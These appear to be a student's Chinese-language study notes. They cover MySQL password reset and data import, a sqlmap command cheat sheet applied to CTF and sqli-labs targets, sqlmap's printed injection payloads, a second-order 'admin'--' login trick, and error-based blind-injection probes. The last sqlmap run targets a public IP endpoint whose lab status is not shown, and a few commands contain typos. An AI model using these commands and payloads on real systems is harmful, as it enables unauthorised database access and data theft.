今天老纪约谈,狠狠压力我们,看来不得不好好学习了

学长说 sql 很重要,我觉得应该从怎么开创一个数据库开始!!

当你忘记密码时候想要登入/phpMyAdmin

登入/phpMyAdmin

1
浏览器输入:http://localhost/phpMyAdmin/

修改配置文件

找到 MySQL 配置文件(通常在 C:\ProgramData\MySQL\MySQL Server 8.0\my.ini),在 [mysqld] 部分添加:

1
2
[mysqld]
skip-grant-tables  # 跳过权限验证(临时绕过密码)

(记得停止服务)

1
mysqlsh -u root

成功登入:

image-20250614003621608

1
2
FLUSH PRIVILEGES;			#刷新权限
ALTER USER 'root'@'localhost' IDENTIFIED BY 'root';    #设置密码
成功登入

image-20250614003910774

观察sql文件

image-20250614004244159

我们随机导出一个sql文件,发现:

出现数据

image-20250614004415532

我该怎么导入新数据呢?

方法 1:通过 phpMyAdmin 导入
方法 2:通过命令行导入导入
1
mysqlsh -u 用户名 -p 数据库名 < 文件路径
方法 3:在 SQL 文件中直接添加新数据

image-20250614005504604

再把这个文件导入即可

1
2
mysql -u root -p challenges < C:\data\modified_dump.sql    #相应位置
#challenges是库名

/phpMyAdmin

image-20250614005818170

(如果有重复列记得删一下

image-20250614005909503

成功导入

易错点:

image-20250616012042903

记得不能出现两个分号

sqlmap使用

Kali中是自带sqlmap的:

image-20250616000223857

sqlmap语法:

mysql:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sqlmap -u 'http://xx/?id=1'				#普通

sqlmap -u "http://test.com/login.php" --data="username=admin&password=pass"
										#post传输
sqlmap -u <URL> --cookie=<COOKIE> --banner
										#识别指纹
sqlmap -u <URL> --dbs
										#获取库
ssqlmap -u <URL> -D 'security' --tables
                                        #访问<security>库的表
sqlmap -u <URL> -D 'security' -T 'users' --tables
										#访问<security>库中[users]表的列
sqlmap -u <URL> -D dvwa -T users -C "user_id,password" --dump
										#访问具体的列

sqlite:

1
2
3
4
5
6
7
8
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" --tables
											#查表(没有库)

sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" -T flag --columns
											#查列
											
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" -T flag -C flag --dump
											#具体

另外的方法:

1
2
sqlmap -r /home/flitar/桌面/bp/bp.txt
					#把抓包内容放在bp.txt里面

返回:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] 
											#仅仅使用union测试
											#Y是,n是不用
											
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
											#看上去像mysql,是否只用mysql
											#Y是
											
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
											#是否需要认真扫描,还是只需要level-1
											#Y是要认真,n是只需要level-1模式
											
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
										#`id`这个确定为注入点,还要找其他注入点吗
										#y需要,N不需要
										
got a 302 redirect to 'http://node4.anna.nssctf.cn:28655/home'. Do you want to follow? [Y/n]
											#发生了302重定向
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] 
											#重定向后还需要发送POST请求吗
you have not declared cookie(s), while server wants to set its own ('session=eyJyb2xlIjo..._io5XcUlGw'). Do you want to use those [Y/n]
										#检测到服务器返回了新的 Cookie,是否继续

sqli-labs为例子:

1
sqlmap -u 'http://172.29.37.209/sqli-labs-master/Less-3/?id=1'
结果:

image-20250616010208562

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 3903=3903 AND ('ytjT'='ytjT

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1') AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(8776=8776,1))),0x717a767071),8776) AND ('aYiq'='aYiq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 5362 FROM (SELECT(SLEEP(5)))GuAf) AND ('DXUK'='DXUK

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-4852') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,0x654c714b6763476b4d5156415a654344735065456a6f57784f67414475716f4e654c7249597a7754,0x717a767071)-- -
---
确定存在即可:
1
sqlmap -u 'http://172.29.37.209/sqli-labs-master/Less-3/?id=1' --dbs

image-20250616010851513

成功

POST链接测试:([NSSRound#1 Basic]sql_by_sql

先使用二次覆盖来成功**登入admin**页面:

1
2
3
4
5
#1.注册:admin'--

#2.修改 admin'-- 密码

#3.登入 admin

image-20250616021509702

抓取到一个特殊的路由:

image-20250616021832698

测试sqlmap
1
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY"

POST测试就是要加上一个session:

image-20250616022655619

正常本来应该是:

1
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" --dbs

但是是sqlite,没有库的概念:

1
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" --tables

image-20250616023242009

查列:
1
sqlmap -u "http://node4.anna.nssctf.cn:28655/query" --data="id=1" --cookie="eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.aE8NEA.sn_S8Y2QbmHZxgcnYzrLNezq5EY" -T flag --columns
具体:

image-20250616024055832

sql注入:

测试是否有:

1
2
3
-if(1=1,1,exp(710)) 

-if(1=2.1,exp(709))

image-20250807004218839

爆破表

1
||if(substr(user(),1,1)=’x’,1,exp(710))||
1
2
descs=1/(ascii(substr(user,1,1))-97)
#利用除法报错
1
2
3
"http://120.79.142.29:8098/api/jobJdbcDatasource?current=1&size=10&descs=1" --dbms=postgresql --method=GET  --level=5 --technique=E --time-sec=5 -p descs --headers="Tecode: 1011122" --batch --dbs

sqlmap "http://120.79.142.29:8098/api/jobJdbcDatasource?current=1&size=10&descs=1" --dbms=postgresql --method=GET --level=5 --risk=3 --time-sec=5 -p descs --headers="Tecode: 1011122" '''这是叫头部增加,可以不要也可以增加''' --dbs --tamper=space2comment,charencode,randomcase
backtop